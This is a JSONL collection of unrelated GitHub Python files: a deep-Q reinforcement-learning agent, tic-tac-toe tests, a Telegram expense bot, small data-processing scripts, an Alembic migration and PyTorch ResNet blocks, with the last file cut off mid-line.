+{"seq_id":"44567925147","text":"import itertools\nfrom datetime import datetime\n\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow.contrib.layers as layers\nfrom gym.spaces import Box, MultiBinary, Discrete\nfrom baselines import deepq, logger\nfrom baselines.common import tf_util\nfrom baselines.common.schedules import LinearSchedule\nfrom baselines.deepq.replay_buffer import ReplayBuffer\n\nfrom algorithms.recovery import sparse_label_propagation\nfrom graph_functions import nmse, random_walk_error\nfrom utils import TIMESTAMP_FORMAT, dump_pickle\nfrom visualization import draw_partitioned_graph\nfrom envs import GraphSamplingEnv, SimpleThreeClusterEnv\n\ndef model_fn(inpt, num_actions, scope, reuse=False):\n \"\"\"This model takes as input an observation and returns values of all\n actions.\n \"\"\"\n with tf.variable_scope(scope, reuse=reuse):\n out = inpt\n out = layers.fully_connected(out,\n num_outputs=50,\n activation_fn=tf.nn.relu)\n out = layers.fully_connected(out,\n num_outputs=num_actions,\n activation_fn=None)\n return out\n\nclass BaseAgent(object):\n def __init__(self,\n env,\n gamma=0.99,\n learning_rate=5e-4,\n replay_buffer_size=500000,\n exploration_schedule_steps=1000000,\n exploration_initial_prob=1.0,\n exploration_final_prob=0.02,\n random_walk_sampling_args=None):\n self.env = env\n self._gamma = gamma\n self._learning_rate = learning_rate\n self._replay_buffer_size = replay_buffer_size\n self._exploration_schedule_steps = exploration_schedule_steps\n self._exploration_final_prob = exploration_final_prob\n self._exploration_initial_prob = exploration_initial_prob\n self._random_walk_sampling_args = random_walk_sampling_args\n self._build_train()\n self.session = tf_util.make_session(1)\n\n def _observation_ph_generator(self, name):\n env = self.env\n\n if isinstance(env.observation_space, (MultiBinary, Discrete)):\n batch_shape = (env.observation_space.n,)\n elif isinstance(env.observation_space, Box):\n batch_shape = env.observation_space.shape\n else:\n raise ValueError(\"Unexpected observation space\")\n\n return tf_util.BatchInput(batch_shape, name=name)\n\n def _build_train(self):\n env = self.env\n\n act, train, update_target, debug = deepq.build_train(\n make_obs_ph=self._observation_ph_generator,\n q_func=model_fn,\n num_actions=env.action_space.n,\n optimizer=tf.train.AdamOptimizer(learning_rate=self._learning_rate),\n gamma=self._gamma\n )\n\n self.act = act\n self.train = train\n self.update_target = update_target\n self.debug = debug\n\n def learn(self):\n act = self.act\n train = self.train\n update_target = self.update_target\n\n\n env = self.env\n with self.session.as_default():\n replay_buffer = ReplayBuffer(self._replay_buffer_size)\n exploration = LinearSchedule(\n schedule_timesteps=self._exploration_schedule_steps,\n initial_p=self._exploration_initial_prob,\n final_p=self._exploration_final_prob)\n\n tf_util.initialize()\n update_target()\n\n episode_rewards = [0.0]\n episode_errors = []\n episode_rw_errors = []\n episode_error_diffs = []\n observation = env.reset()\n\n for t in itertools.count():\n # Take action and update exploration to the newest value\n action = act(observation[None], update_eps=exploration.value(t))[0]\n new_observation, reward, done, _ = env.step(action)\n # Store transition in the replay buffer.\n replay_buffer.add(observation, action, reward,\n new_observation, float(done))\n observation = new_observation\n\n episode_rewards[-1] += reward\n\n if done:\n episode_errors.append(env.error)\n 
episode_rewards.append(0)\n if self._random_walk_sampling_args is not None:\n sampling_args = self._random_walk_sampling_args\n sampling_args.update({\"graph\": env.graph})\n rw_error = random_walk_error(sampling_args)\n episode_rw_errors.append(rw_error)\n episode_error_diffs.append(rw_error - env.error)\n\n if len(episode_rewards) % 10 == 0:\n nmse = env.get_current_nmse()\n logger.record_tabular(\"steps\", t)\n logger.record_tabular(\"episodes\", len(episode_rewards))\n logger.record_tabular(\"mean episode reward\",\n round(np.mean(episode_rewards[-101:-1]), 3))\n logger.record_tabular(\"mean episode error\",\n round(np.mean(episode_errors[-101:-1]), 3))\n logger.record_tabular(\"nmse\", nmse)\n logger.record_tabular(\"sampling set\",\n [int(v) for v in env.sampling_set])\n logger.record_tabular(\"% time spent exploring\",\n int(100 * exploration.value(t)))\n if self._random_walk_sampling_args is not None:\n logger.record_tabular(\"mean random walk error\", round(np.mean(\n episode_rw_errors[-101:-1]), 3))\n logger.record_tabular(\"mean error diff\",\n round(np.mean(episode_error_diffs[-101:-1]), 3))\n logger.dump_tabular()\n\n observation = env.reset()\n\n # Minimize the Bellman equation error on replay buffer sample batch\n if t > 1000:\n (observations_t, actions, rewards,\n observations_tp1, dones) = replay_buffer.sample(32)\n train(observations_t, actions, rewards,\n observations_tp1, dones, np.ones_like(rewards))\n if t % 1000 == 0:\n # Update target network periodically.\n update_target()\n\n def test(self):\n env = self.env\n act = self.act\n train = self.train\n update_target = self.update_target\n\n with self.session.as_default():\n observation, done = env.reset(), False\n while not done:\n action = act(observation[None], update_eps=0.9)[0]\n observation, reward, done, _ = env.step(action)\n\n nmse = env.get_current_nmse()\n print(\"nmse: \", nmse)\n","repo_name":"hartikainen/rl-graph-signal-recovery","sub_path":"agents/base_agent.py","file_name":"base_agent.py","file_ext":"py","file_size_in_byte":6247,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"91"}
+{"seq_id":"1857530850","text":"import unittest\n\nfrom src.board import Board\n\n\nclass TestBoard(unittest.TestCase):\n def setUp(self):\n self.board = Board()\n self.starter_board = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n self.full_board = [\"X\", \"O\", \"X\", \"O\", \"X\", \"O\", \"X\", \"O\", \"X\"]\n\n def test_board_to_string(self):\n expected_message = f\" {self.starter_board[0]} | {self.starter_board[1]} | {self.starter_board[2]} \\n---+---+---\\n {self.starter_board[3]} | {self.starter_board[4]} | {self.starter_board[5]} \\n---+---+---\\n {self.starter_board[6]} | {self.starter_board[7]} | {self.starter_board[8]}\"\n\n actual_message = self.board.to_string(self.starter_board)\n\n self.assertEqual(expected_message, actual_message)\n\n def test_is_full_returns_true_if_board_is_full(self):\n total_marks_on_board = self.board.count_marks(self.full_board, \"X\", \"O\")\n\n self.assertTrue(self.board.is_full(total_marks_on_board, self.full_board))\n\n def test_is_full_returns_false_if_board_isnt_full(self):\n not_full_board = [\"X\", \"2\", \"3\", \"4\", \"X\", \"O\", \"X\", \"O\", \"X\"]\n total_marks_on_board = self.board.count_marks(not_full_board, \"X\", \"O\")\n\n self.assertFalse(self.board.is_full(total_marks_on_board, not_full_board))\n\n def test_is_full_returns_true_if_board_is_full_with_emojis(self):\n full_board = [\"🤡\", \"👻\", \"🤡\", \"👻\", \"🤡\", \"👻\", \"🤡\", \"👻\", \"🤡\"]\n total_marks_on_board = self.board.count_marks(full_board, \"🤡\", \"👻\")\n\n self.assertTrue(self.board.is_full(total_marks_on_board, full_board))\n\n def test_no_turns_taken_yet(self):\n total_marks_on_board = self.board.count_marks(self.starter_board, \"X\", \"O\")\n\n self.assertEqual(0, total_marks_on_board)\n\n def test_one_turn_taken_returns_one_mark_on_board(self):\n current_board = [\"X\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n total_marks_on_board = self.board.count_marks(current_board, \"X\", \"O\")\n\n self.assertEqual(1, total_marks_on_board)\n\n def test_two_turns_taken_returns_two_marks_on_board(self):\n current_board = [\"X\", \"O\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n total_marks_on_board = self.board.count_marks(current_board, \"X\", \"O\")\n\n self.assertEqual(2, total_marks_on_board)\n\n def test_one_turn_taken_returns_one_mark_on_board_with_emoji(self):\n current_board = [\"1\", \"🤡\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n total_marks_on_board = self.board.count_marks(current_board, \"🤡\", \"👻\")\n\n self.assertEqual(1, total_marks_on_board)\n\n def test_mark_board_marks_board_with_user_selection(self):\n test_mark_one = \"X\"\n test_mark_two = \"O\"\n test_mark_three = \"🤡\"\n expected_board = [\"X\", \"O\", \"X\", \"🤡\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n\n result_one = self.board.mark_board(1, self.starter_board, test_mark_one)\n result_two = self.board.mark_board(2, self.starter_board, test_mark_two)\n result_three = self.board.mark_board(3, self.starter_board, test_mark_one)\n result_four = self.board.mark_board(4, self.starter_board, test_mark_three)\n\n self.assertEqual(expected_board, result_one)\n self.assertEqual(expected_board, result_two)\n self.assertEqual(expected_board, result_three)\n self.assertEqual(expected_board, result_four)\n\n def test_is_spot_taken_returns_true_when_spot_is_taken(self):\n self.assertTrue(\n self.board.is_spot_taken([\"X\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"], 1)\n )\n self.assertTrue(\n self.board.is_spot_taken([\"1\", \"X\", \"3\", \"4\", \"5\", 
\"6\", \"7\", \"8\", \"9\"], 2)\n )\n self.assertTrue(\n self.board.is_spot_taken([\"🤡\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"], 1)\n )\n\n def test_is_spot_taken_returns_false_if_spot_is_not_taken(self):\n test_board = [\"1\", \"X\", \"3\", \"O\", \"X\", \"6\", \"O\", \"8\", \"9\"]\n test_emoji_board = [\"1\", \"🤡\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n\n self.assertFalse(self.board.is_spot_taken(self.starter_board, 1))\n self.assertFalse(self.board.is_spot_taken(test_board, 3))\n self.assertFalse(self.board.is_spot_taken(test_emoji_board, 9))\n","repo_name":"t-keazirian/tic-tac-toe","sub_path":"test/test_board.py","file_name":"test_board.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2118600639","text":"from aiogram import types\nfrom aiogram.utils.markdown import text, italic\nfrom aiogram.utils.emoji import emojize\n\nfrom dispatcher import dp, bot\nimport exceptions\nimport expenses\nimport diagram\nimport keyboards as kb\nfrom categories import Categories\nfrom botDb import BotDB\n\n\n@dp.message_handler(commands=['start'])\nasync def show_today_expenses(message: types.Message):\n \"\"\"Выводит внесенные расходы за день\"\"\"\n if not BotDB().user_exists(message.from_user.id):\n BotDB().add_user(message.from_user.id)\n await send_welcome(message)\n\n\n@dp.message_handler(commands=['help'])\nasync def send_welcome(message: types.Message):\n \"\"\"This handler will be called when user sends `/start` or `/help` command\"\"\"\n await message.answer(text(\n emojize(f\"Бот для учёта финансов :star:\\n\\n\"),\n italic(\"Добавить расход: 999 продукты\\n\"\n \"Сегодняшняя статистика: /today\\n\"\n \"За текущий месяц: /month\\n\"\n \"Последние внесённые расходы: /last\\n\"\n \"Диаграмма расходов: /diagram\\n\"\n \"Установить расход в день: /daily cash\\n\"\n \"Категории трат: /categories\")), parse_mode=types.ParseMode.MARKDOWN)\n\n\n@dp.message_handler(commands=['today'])\nasync def show_today_expenses(message: types.Message):\n \"\"\"Выводит внесенные расходы за день\"\"\"\n answer_message = expenses.get_day_statistics(message.from_user.id)\n await message.answer(answer_message)\n\n\n@dp.message_handler(commands=['month'])\nasync def show_month_expenses(message: types.Message):\n \"\"\"Выводит внесенные расходы за месяц\"\"\"\n month_statistics = expenses.get_month_statistics(message.from_user.id)\n if not month_statistics:\n answer_message = \"В этом месяце нет расходов\"\n await message.answer(answer_message)\n return\n answer_message = f\"Расходы за месяц\\nВсего: {month_statistics}\"\n await message.answer(answer_message, reply_markup=kb.inline_kb_month)\n\n\n@dp.message_handler(commands=['last'])\nasync def list_expenses(message: types.Message):\n \"\"\"Отправляет последние несколько записей о расходах\"\"\"\n last_expenses = expenses.last(message.from_user.id)\n if not last_expenses:\n await message.answer(\"Расходы ещё не заведены\")\n return\n last_expenses_rows = [\n f\"{expense.cash} руб. 
на {expense.category} — нажми \"\n f\"/del{expense.ex_id} для удаления\"\n for expense in last_expenses]\n answer_message = \"Последние сохранённые траты:\\n\\n* \" + \"\\n\\n* \" \\\n .join(last_expenses_rows)\n await message.answer(answer_message)\n\n\n@dp.message_handler(commands=['daily'])\nasync def daily_expense(message: types.Message):\n \"\"\"Устанавливает базовый расход в день и выводит сообщение\"\"\"\n try:\n answer_message = expenses.set_daily_limit(message.text, message.from_user.id)\n except exceptions.UncorrectMessage as e:\n await message.reply(f'{str(e)}, напиши типо: /daily 500')\n return\n await message.answer(answer_message, parse_mode=types.ParseMode.MARKDOWN)\n\n\n@dp.message_handler(commands=['diagram'])\nasync def show_diagram(message: types.Message):\n \"\"\"Рисует диаграмму расходов\"\"\"\n diagram_name = diagram.save_diagram(message.from_user.id)\n if diagram_name:\n reply_markup = kb.get_diagram_keyboard(message.chat.id)\n await message.answer(\"Diagram\", reply_markup=reply_markup)\n else:\n await message.answer(\"Расходы еще не заведены\")\n\n\n@dp.message_handler(commands=['categories'])\nasync def show_categories(message: types.Message):\n \"\"\"Выводит категории трат\"\"\"\n categories = Categories().get_all_categories()\n answer_message = \"Категории трат:\\n\\n-- \" + \\\n (\"\\n-- \".join([emojize(c.emoji) + ' ' + c.name\n for c in categories]))\n await message.answer(answer_message)\n\n\n@dp.message_handler(lambda message: message.text.startswith('/del'))\nasync def del_expense(message: types.Message):\n \"\"\"Удаляет одну запись о расходе по её идентификатору\"\"\"\n try:\n row_id = int(message.text[4:])\n except ValueError:\n await message.reply(emojize('Не понял :face_with_raised_eyebrow:'))\n return\n expenses.delete_expense(row_id, message.from_user.id)\n answer_message = \"Удалил\"\n await message.answer(answer_message)\n\n\n@dp.message_handler()\nasync def add_expense(message: types.Message):\n \"\"\"Добавляет расход\"\"\"\n try:\n expense = expenses.add_expense(message.text, message.from_user.id)\n except exceptions.UncorrectMessage as e:\n await message.reply(str(e)+', напиши типо: 100 такси')\n return\n answer_message = emojize(f\"Добавил траты: {expense.cash}₽ на {expense.category}:white_check_mark:\\n\") +\\\n expenses.calculate_avalible_expenses(message.from_user.id)\n await message.answer(answer_message, parse_mode=types.ParseMode.MARKDOWN)\n\n\n@dp.message_handler(content_types=types.message.ContentType.ANY)\nasync def unknown_message(msg: types.Message):\n \"\"\"Отвечает на разные типы сообщений\"\"\"\n message_text = emojize(f'Я не знаю, что с этим делать :face_with_symbols_on_mouth:,\\n'\n f'Я просто напомню что есть /help')\n await msg.reply(message_text)\n\n\n@dp.callback_query_handler(text=\"month_expenses\")\nasync def send_month_expenses(call: types.CallbackQuery):\n \"\"\"Выводит суммы расходов по дням\"\"\"\n await call.message.answer(kb.month_btn_data(call.from_user.id))\n await call.answer()\n\n\n@dp.callback_query_handler(kb.callback_data_diagram.filter(filter='diagram_month'))\nasync def send_diagram_month(call: types.CallbackQuery, callback_data: dict):\n \"\"\"Отправляет диаграмму о расходах за месяц\"\"\"\n chat_id = callback_data['chat_id']\n diagram_name = diagram.save_diagram(call.from_user.id, 'month')\n await bot.send_photo(chat_id=chat_id, photo=open(diagram_name, 'rb'),\n caption='Диаграмма за месяц')\n await call.answer()\n 
diagram.delete_diagram()\n\n\n@dp.callback_query_handler(kb.callback_data_diagram.filter(filter='diagram_year'))\nasync def send_diagram_year(call: types.CallbackQuery, callback_data: dict):\n \"\"\"Отправляет диаграмму о расходах за год\"\"\"\n chat_id = callback_data['chat_id']\n diagram_name = diagram.save_diagram(call.from_user.id, 'year')\n await bot.send_photo(chat_id=chat_id, photo=open(diagram_name, 'rb'),\n caption='Диаграмма за год')\n await call.answer()\n diagram.delete_diagram()\n","repo_name":"Expece/tg-finance-bot","sub_path":"handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":7250,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"11389892934","text":"import urllib.request\n\n# Given two .txt files that have lists of numbers in them,\n# find the numbers that are overlapping.\n\n# IS it betrer to use a function to convert a list to an array of number\ndef file_reader(file_to_read):\n\twith urllib.request.urlopen(file_to_read) as file:\n\t\tline = file.readline()\n\t\tfile_to_read_holder = []\n\t\twhile line:\n\t\t\tfile_to_read_holder.append(line.strip().decode(\"utf-8\"))\n\t\t\tline = file.readline()\n\n\treturn file_to_read_holder\n\t\n# Using list comprehension\ndef check_for_overlapping(list1, list2):\n\treturn print([val for val in list1 if val in list2])\n\n\nif __name__ == '__main__':\n\turl1 = \"http://www.practicepython.org/assets/primenumbers.txt\"\n\turl2 = \"http://www.practicepython.org/assets/happynumbers.txt\"\n\tcheck_for_overlapping(file_reader(url1), file_reader(url2))\n","repo_name":"dtdao/learning-python-django","sub_path":"exercise23.py","file_name":"exercise23.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"19464656919","text":"import sys\nfrom collections import defaultdict\n\ndef corpus_iterator(corpus_file):\n\n\tcorpus_list = []\n\tl = corpus_file.readline()\n\twhile l:\n\t\tline = l.strip()\n\t\tif line:\n\t\t\tfields = line.split(\" \")\n\t\t\tne_tag = fields[-1]\n\t\t\tword = \" \".join(fields[:-1])\n\t\t\tcorpus_list.append((word, ne_tag)) \n\t\telse:\n\t\t\tcorpus_list.append((None, None))\n\t\tl = corpus_file.readline()\n\treturn corpus_list\n\ndef count(corpus_iterator):\n\n\tcounter = defaultdict(int)\n\tfor l in corpus_iterator:\n\t\tif l[0]:\n\t\t\tcounter[l[0]] += 1\n\treturn counter\n\ndef write(iterator, counter, output):\n\tfor l in iterator:\n\t\tif l[0]:\n\t\t\tif counter[l[0]] >= 5:\n\t\t\t\toutput.write(\"%s %s\\n\" %(l[0], l[1]))\n\t\t\telse:\n\t\t\t\toutput.write(\"_RARE_ %s\\n\" %l[1])\n\t\telse:\n\t\t\toutput.write(\"\\n\")\n\n\nif __name__ == \"__main__\":\n\n if len(sys.argv)!=2: \n usage()\n sys.exit(2)\n\n try:\n input = open(sys.argv[1],\"r\")\n except IOError:\n sys.stderr.write(\"ERROR: Cannot read inputfile %s.\\n\" % arg)\n sys.exit(1)\t\n\n\n iterator = corpus_iterator(input)\n counter = count(iterator)\n \n write(iterator, counter, sys.stdout)","repo_name":"chrisyrniu/HMM_Trigram","sub_path":"tag_rare.py","file_name":"tag_rare.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"6692141488","text":"#-----------------------------------------------------\n# Ref YATSM :https://github.com/ceholden/yatsm\n# ----------------------------------------------------\n# Script Name: extractArray.py\n# Author: Suryakant Sawant (suryakant54321@gmail.com)\n# Date: 20 August 2015\n# This script helps to extract data from cache of YATSM :) \n# to increase Time Series analysis capabilities \n# \n# 1. Read all chache files (.npz)\n# 2. Extract usable information\n# \tband number, date, reflectance\n# 3. Write csv file with pixel details \n#\tconvention used for output files\n#\t_.csv \n#\n# \tsimple ! is it !! ?? :) \n# 4. Now you can use output and process it with \n# \tPython / R / Spreadsheets / Matlab\n#\n# Note: If you are successful in running TSTools / YATSM\n#\tin QGIS(i.e. \n#\t\thttps://github.com/ceholden/TSTools or \n#\t\thttps://github.com/ceholden/yatsm\n#\n#\tI am trying to make it more simple. \n#\tSome sections are hard coded (marked with #--*--)\n#-----------------------------------------------------\n#!/bin python2\nimport os, re, gdal\nimport numpy as np\nimport shutil, time\n# To Do : plot values on the fly :)\n#import * from pylab\n#import matplotlib\t\n#\n# Your project path\nos.chdir(\"/media/opengeo-usb/surya2\")\t\t\t\t#--*--\n# cache path\ncacheDir = \"suryaWork/work/8_thermalData/4_tsData/cache\" \t#--*--\ncsvPath = \"suryaWork/work/8_thermalData/6_TimeSeriesOutput\" \t#--*--\ndef extract(cacheDir, csvPath):\n\t#print (cacheDir)\t\n\tallFiles = os.listdir(cacheDir) \n\tcount = 0\n\tfor zipAray in allFiles:\n\t\t#print(zipAray)\n\t\tif zipAray.endswith(\".npz\"):\n\t\t\tfilePath = (\"%s/%s\")%(cacheDir, zipAray)\n\t\t\ta = np.load(filePath)\n\t\t\tprint(\"==========================\\n \\\n\t\t\tProcessing new %s File \")%(zipAray)\n\t\t\tprint (\"Keys = %s\")%(a.keys())\n\t\t\t# ['image_0', 'data_0']\n\t\t\tmetData = a['image_0']\n\t\t\tprint(\"datatype of key image_0 = %s\")%(metData.dtype)\n\t\t\t\"\"\" \n\t\t\t[('filename', 'O'), ('path', 'O'), ('id', 'O'), \n\t\t\t('date', 'O'), ('ordinal', '/subset_LT51450451990031.tif', \n\t\t\t'LT51450451990031', datetime.datetime(1990, 1, 31, 0, 0), 726498L, 31)\n\t\t\t\"\"\"\n\t\t\tdata = a['data_0']\n\t\t\tprint (\"Number of arrays/Bands in data = %s\")%(len(data))\n\t\t\tprint (\"Number of observations for a band = %s\")%(len(data[0]))\n\t\t\tprint (\"shape of data array = \");print(data.shape)\n\t\t\t# Fun Starts here :)\n\t\t\ttData = np.transpose(data)\n\t\t\tprint (\"New shape of data array = \");print(tData.shape)\n\t\t\t#***\n\t\t\tfNames = []\n\t\t\tdateTime = []\n\t\t\tordDay = []\n\t\t\tfor i in range(0,len(metData)):\n \t\t\t\tfNames.append(metData[i][2])\t#--*--\n \t\t\t\tdateTime.append(metData[i][3])\t#--*--\n \t\t\t\tordDay.append(metData[i][4])\t#--*--\t\t\t\n\t\t\tfNames = np.asarray(fNames, dtype=np.str)\n\t\t\tdateTime = np.asarray(dateTime, dtype=np.str)\n\t\t\tordDay = np.asarray(ordDay, dtype=np.str)\n\t\t\tnumRows = len(fNames)\n\t\t\tfNames = fNames.reshape(numRows,1)\n\t\t\tdateTime = dateTime.reshape(numRows,1)\n\t\t\tordDay = ordDay.reshape(numRows,1)\n\t\t\t#***\n\t\t\t# concatenate all arrays. 
This (#*** to #***) can be done in much better and faster way :)\n\t\t\tallMet = np.concatenate((fNames, dateTime, ordDay, tData), axis=1)\n\t\t\tprint(\"New array shape = \")\t\t\t\n\t\t\tprint(allMet.shape)\n\t\t\tjj = allMet.shape\n\t\t\tcsvFile = re.split('_',zipAray) # x1121y1090_i0n388b8.npz\n\t\t\tcsvFile = (\"%s_r%sc%s.csv\")%(csvFile[0],jj[0], jj[1])\n\t\t\tcsvFile = (\"%s/%s\")%(csvPath, csvFile)\n\t\t\tnp.savetxt(csvFile, allMet, delimiter=',', fmt='%19s', header='name, date, ordate, b, g, r, nir, swir1, swir2, cfmask, thermal')\n\t\t\t#print (\"Array %s available\")%(zipAray) \n#--\nextract(cacheDir, csvPath)\n#\n","repo_name":"suryakant54321/basicDataPrep","sub_path":"extractArray.py","file_name":"extractArray.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"}
+{"seq_id":"10637849630","text":"import sqlalchemy as sa\n\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"028ec0c3c704\"\ndown_revision = \"4b5532b0ac1e\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\"project\", sa.Column(\"config\", sa.JSON(), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"project\", \"config\")\n # ### end Alembic commands ###\n","repo_name":"project-chip/certification-tool-backend","sub_path":"alembic/versions/028ec0c3c704_add_project_config.py","file_name":"028ec0c3c704_add_project_config.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"}
+{"seq_id":"19528318461","text":"__all__ = ['ResNet']\n\n\nimport re\nimport torch.nn as nn\nfrom functools import partial\nfrom ...operators import get_gapool_op, get_flatten_op\n\n\n# 从bag_of_tricks论文划分,3类skip connection:\n# 1. ideneity\n# 2. 原始ResNet的conv downsample\n# 3. Bag of Tricks的avgpool downsample\n# 从pre-act与否划分,2类skip connection:\n# 1. 原始ResNet的post-activation模式,weight-bn-relu,最后的relu跟外面的block共享,略去,只剩weight-bn\n# 2. pre-activation模式,bn-relu-conv,最前面的bn-relu跟外面的block共享,略去,只剩weight\ndef skip_connection(in_channels, out_channels, stride, avg_down, pre_act):\n if in_channels == out_channels and stride == 1:\n return nn.Sequential()\n elif stride == 1 or not avg_down:\n if not pre_act:\n return nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 1, stride, bias=False),\n nn.BatchNorm2d(out_channels),\n )\n else:\n return nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 1, stride, bias=False),\n )\n else:\n if not pre_act:\n return nn.Sequential(\n nn.AvgPool2d(stride, stride, ceil_mode=True, count_include_pad=False),\n nn.Conv2d(in_channels, out_channels, 1, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n )\n else:\n return nn.Sequential(\n nn.AvgPool2d(stride, stride, ceil_mode=True, count_include_pad=False),\n nn.Conv2d(in_channels, out_channels, 1, 1, bias=False),\n )\n\n\nclass SqueezeExcitation(nn.Module):\n\n def __init__(self, channels, ratio=16):\n super(SqueezeExcitation, self).__init__()\n self.avgpool = get_gapool_op()\n neck_channels = max(1, channels // ratio)\n self.mlp = nn.Sequential(\n nn.Conv2d(channels, neck_channels, kernel_size=1, bias=False),\n nn.ReLU(inplace=True),\n nn.Conv2d(neck_channels, channels, kernel_size=1, bias=False),\n nn.Sigmoid(),\n )\n\n def forward(self, x):\n w = self.avgpool(x)\n w = self.mlp(w)\n return w * x\n\n\nclass BasicBlockV1(nn.Module):\n\n def __init__(self, in_channels, out_channels, stride, shrink=None, num_groups=1, avg_down=False, neck_down=None):\n super(BasicBlockV1, self).__init__()\n self.conv1 = nn.Conv2d(in_channels, out_channels, 3, stride, 1, bias=False)\n self.bn1 = nn.BatchNorm2d(out_channels)\n self.relu1 = nn.ReLU(inplace=True)\n self.conv2 = nn.Conv2d(out_channels, out_channels, 3, 1, 1, bias=False, groups=num_groups)\n self.bn2 = nn.BatchNorm2d(out_channels)\n self.relu2 = nn.ReLU(inplace=True)\n self.skip = skip_connection(in_channels, out_channels, stride, avg_down, pre_act=False)\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu1(out)\n out = self.conv2(out)\n out = self.bn2(out)\n out += self.skip(x)\n out = self.relu2(out)\n return out\n\n\nclass BasicBlockV2(nn.Module):\n\n def __init__(self, in_channels, out_channels, stride, shrink=None, num_groups=1, avg_down=False, neck_down=None):\n super(BasicBlockV2, self).__init__()\n self.bn1 = nn.BatchNorm2d(in_channels)\n self.relu1 = nn.ReLU(inplace=True)\n self.conv1 = nn.Conv2d(in_channels, out_channels, 3, stride, 1, bias=False)\n self.bn2 = nn.BatchNorm2d(out_channels)\n self.relu2 = nn.ReLU(inplace=True)\n self.conv2 = nn.Conv2d(out_channels, out_channels, 3, 1, 1, bias=False, groups=num_groups)\n self.skip = skip_connection(in_channels, out_channels, stride, avg_down, pre_act=True)\n\n def forward(self, x):\n x = self.bn1(x)\n x = self.relu1(x)\n out = self.conv1(x)\n out = self.bn2(out)\n out = self.relu2(out)\n out = self.conv2(out)\n out += self.skip(x)\n return out\n\n\nclass BottleneckV1(nn.Module):\n\n def __init__(self, in_channels, out_channels, stride, shrink=4, num_groups=1, avg_down=False, 
neck_down=False):\n super(BottleneckV1, self).__init__()\n neck_channels = round(out_channels / shrink)\n if not neck_down:\n in_stride, neck_stride = stride, 1\n else:\n in_stride, neck_stride = 1, stride\n\n self.conv1 = nn.Conv2d(in_channels, neck_channels, 1, in_stride, 0, bias=False)\n self.bn1 = nn.BatchNorm2d(neck_channels)\n self.relu1 = nn.ReLU(inplace=True)\n self.conv2 = nn.Conv2d(neck_channels, neck_channels, 3, neck_stride, 1, bias=False, groups=num_groups)\n self.bn2 = nn.BatchNorm2d(neck_channels)\n self.relu2 = nn.ReLU(inplace=True)\n self.conv3 = nn.Conv2d(neck_channels, out_channels, 1, bias=False)\n self.bn3 = nn.BatchNorm2d(out_channels)\n self.relu3 = nn.ReLU(inplace=True)\n self.skip = skip_connection(in_channels, out_channels, stride, avg_down, pre_act=False)\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu1(out)\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu2(out)\n out = self.conv3(out)\n out = self.bn3(out)\n out += self.skip(x)\n out = self.relu3(out)\n return out\n\n\nclass BottleneckV2(nn.Module):\n\n def __init__(self, in_channels, out_channels, stride, shrink=4, num_groups=1, avg_down=False, neck_down=False):\n super(BottleneckV2, self).__init__()\n neck_channels = round(out_channels / shrink)\n if not neck_down:\n in_stride, neck_stride = stride, 1\n else:\n in_stride, neck_stride = 1, stride\n\n self.bn1 = nn.BatchNorm2d(in_channels)\n self.relu1 = nn.ReLU(inplace=True)\n self.conv1 = nn.Conv2d(in_channels, neck_channels, 1, in_stride, 0, bias=False)\n self.bn2 = nn.BatchNorm2d(neck_channels)\n self.relu2 = nn.ReLU(inplace=True)\n self.conv2 = nn.Conv2d(neck_channels, neck_channels, 3, neck_stride, 1, bias=False, groups=num_groups)\n self.bn3 = nn.BatchNorm2d(neck_channels)\n self.relu3 = nn.ReLU(inplace=True)\n self.conv3 = nn.Conv2d(neck_channels, out_channels, 1, bias=False)\n self.skip = skip_connection(in_channels, out_channels, stride, avg_down, pre_act=True)\n\n def forward(self, x):\n x = self.bn1(x)\n x = self.relu1(x)\n out = self.conv1(x)\n out = self.bn2(out)\n out = self.relu2(out)\n out = self.conv2(out)\n out = self.bn3(out)\n out = self.relu3(out)\n out = self.conv3(out)\n out += self.skip(x)\n return out\n\n\ndef init_weight(module):\n nn.init.kaiming_normal_(module.weight, mode='fan_out', nonlinearity='relu')\n\n\ndef input_stem(in_channels, out_channels, deep_stem, narrow_stem):\n stem = []\n if (deep_stem, narrow_stem) == (False, False):\n stem.append(nn.Conv2d(in_channels, out_channels, 7, 2, 3, bias=False))\n elif (deep_stem, narrow_stem) == (False, True):\n stem.append(nn.Conv2d(in_channels, out_channels, 3, 2, 1, bias=False))\n elif (deep_stem, narrow_stem) == (True, True):\n neck_channels = out_channels // 2\n stem.append(nn.Conv2d(in_channels, 